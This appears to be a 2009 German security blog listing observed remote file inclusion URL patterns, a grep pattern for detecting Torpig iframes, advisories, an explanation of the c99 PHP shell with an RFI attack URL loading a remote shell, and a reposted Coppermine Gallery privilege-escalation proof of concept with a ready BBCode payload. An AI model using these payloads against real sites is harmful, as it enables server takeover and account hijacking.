BotNetzProvider.de Ein Security Blog über Honig-Töpfe (honeypots) , Bots und Bitcoin

14Jul/091

KW 29 – Top 10 – RFI Patterns

/index.php?redir
/phphtml.php?htmlclass_path
/main.php?pagina
//s_loadenv.inc.php?DOCUMENT_ROOT
/photoalb/lib/static/header.php?set_menu
/?news_id=43/encore/main.php?pagina
/?news_id=43/encore/forumcgi/main.php?pagina
/show.php?path
//cropcanvas.php?cropimagedir
/SQuery/lib/gore.php?libpath

13Mai/090

torpig/mebroot drive-by downloads erkennen via (z)grep

Für alle die Ihren Webspace durchsuchen wollen nach bösartigen IFRAMES hier ein kleiner String:
Dieser String ist gut für die meisten verschlüsselten Torpig/Mebroot IFRAMES.
SSH Zugang wird natürlich vorausgesetzt.
Im root Verzeichnis ausführen.

$ (z)grep -Rl 'function .(.){r="";for(i=0;i<..length;i++){if(..charAt(i)=="."){..="%"}else{..=..cha' *

Natürlich keine Gewähr auf 100% Trefferquote, da es sich dabei um einen statistischen Link handelt. Ich habe aus 42 JavaScript IFRAMES dieses Pattern gebastelt. Grep oder zgrep müsst Ihr entscheiden, je nach Dateien.

25Apr/090

KW 17 – Top 10 – RFI Patterns

//modules/xfsection/modify.php?dir_module=
//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=
/binaries/log/errors.php?error=
//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/?sourcedir=
//components/com_flyspray/startdown.php?file=
//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
//include/write.php?dir=

28Mrz/090

Firefox Exploit – Risk: high

Art: XSL parsing remote memory corruption poc

Alle die Firefox in den folgenden Versionen nutzen

Mozilla Firefox 3.0.7
Mozilla Firefox 3.0.6
Mozilla Firefox 3.0.5
Mozilla Firefox 3.0.4
Mozilla Firefox 3.0.3
Mozilla Firefox 3.0.2
Mozilla Firefox 3.0.1
Mozilla Firefox 3.0

!Windows und Linux User!
sind gefährdet.

Erste Infos gab es dazu auf mailw0rm.

Laut Firefox wird es erst am 01.April ein Fix dazu geben.

Wie kann ich davor schützen:
1. NoScript installieren (Ein AddOn für Firefox) http://noscript.net/
Keine Skripte ausführen bis ein Fix von Firefox herausgegeben wurde.

Offizielle Infos von Firefox HIER

18Mrz/090

Wenn Facebook.com zu einem Botnetz wird

Man hat festgestellt, dass man Facebook.com in ein sehr großes und mächtiges Botnetz umwandeln kann.
Da es Usern möglich ist eigene Scripte (z.B. MafiaWars, etc) in Facebook.com einzubinden, ist es ein relativ einfach bösartige Tools zu entwerfen.



Anbei findet ihr ein Beispielszenario wie so etwas aussehen könnte.

Also seit vorsichtig was Ihr in Facebook.com aktiviert und installiert.

Hier das Beispielszenario zum downloaden: facebotisc08

veröffentlicht unter: Botnetz, Sicherheit keine Kommentare
17Mrz/090

KW 12 – Top 10 – RFI Patterns

Neue RFI Patterns

//?path%5Bdocroot%5D=
/rfi//?path%5Bdocroot%5D=
//includes/mailaccess/pop3.php?CONFIG[pear_dir]=
//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
//ktmllite/includes/ktedit/toolbar.php?dirDepth=
//atom.php5?page=
/rfi//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=
//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=
/errors.php?error=
/rfi/includes/mailaccess/pop3.php?CONFIG[pear_dir]=

Bald wird der RFI Scanner zum download bereit stehn.

2Mrz/090

Webserver Hacken (remote file inclusion) c99

Remote File Inclusion - c99 php shell

Ich denke mal nicht das ich noch groß über das Thema sprechen muss, was genau eine Remote File Inclusion ist.
Für alle die sich damit noch nicht auskennen sollten Wikipedia.de hat einen kurzen Artikel darüber HIER

Daher will ich mich heute mit der wohl am bekanntesten "PHP SHELL" (c99) *beschäftigen.
Es ist natürlich verständlich, dass ich den Quellcode der c99 PHP Shell ein wenig bearbeiten musste, damit man diese
nicht sofort benutzen kann.

Zunächst einmal ist zu sagen, diese Shell muss nicht unbedingt auf dem eigenen Webserver liegen um genutzt zu werden.
Es reicht wenn diese auf einem anderen Webserver in reiner Textform abgelegt ist.

Ein klassisches Angriffsmuster sieht wie folgt aus:

http://der.zu.hackende.server.de/ungeschütze.variable.php?variable=http://pfad.zur.phpShell.de/c99

Wenn dieser Angriff erfolgreich war, wird folgendes Angezeigt: (Beispiel)

Mit dieser nun integrierten Shell, kann man nun den gesamten Webserver steuern.

Folgendes ist mit diesem Tool möglich:

  • FTP-Upload
  • Brute Force Attacken
  • Upload Files
  • SQL
  • Webserver Informationen anzeigen

Wie kann ich dem ganzen vorbeugen:

1. Halten Sie Ihren Server und die Software (Joomla,etc) immer auf dem aktuellsten Stand.
2. Überprüfen Sie öfters die Webserver Logdateien auf ungewöhnliche Einträge.

*leider musste ich die modifizierte Shell offline nehmen. Wurde bei einigen AntiViren Hersteller "blacklisted" 🙂

27Feb/090

Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation

+--------------------------------------------------------------------------+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+--------------------------------------------------------------------------+
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it |
| http://coppermine-gallery.net |
| Don't add me on msn messenger. |
| This vulnerability can be named as "bbcode img tag script injection" |
+--------------------------------------------------------------------------+
| Proof of Concept (an example,to understand it) |
+--------------------------------------------------------------------------+
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
[img]URL[/img] +--------------------------------------------------------------------------+
| Modify [ID] with your user id. |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id] |
+--------------------------------------------------------------------------+
Insert the below code into a new message

hey admin,nice web site 🙂
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]

+-------------------------------------------------------------------------+
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page |
+-------------------------------------------------------------------------+

veröffentlicht unter: Exploits keine Kommentare
27Feb/091

APSA09-01 – Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat

Release date: February 19, 2009

Vulnerability identifier: APSA09-01

CVE number: CVE-2009-0658

Platform: All platforms

Summary:

APSA09-01 - Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat.

veröffentlicht unter: Buffer overflow 1 Kommentar
27Feb/090

Cisco Security Advisory: Multiple Vulnerabilities in the Cisco ACE Application Control Engine Module and Cisco ACE 4710 Application Control Engine – Cisco Systems

FYI

Cisco Security Advisory: Multiple Vulnerabilities in the Cisco ACE Application Control Engine Module and Cisco ACE 4710 Application Control Engine - Cisco Systems.

veröffentlicht unter: Vulnerabilities keine Kommentare
/* google like button API */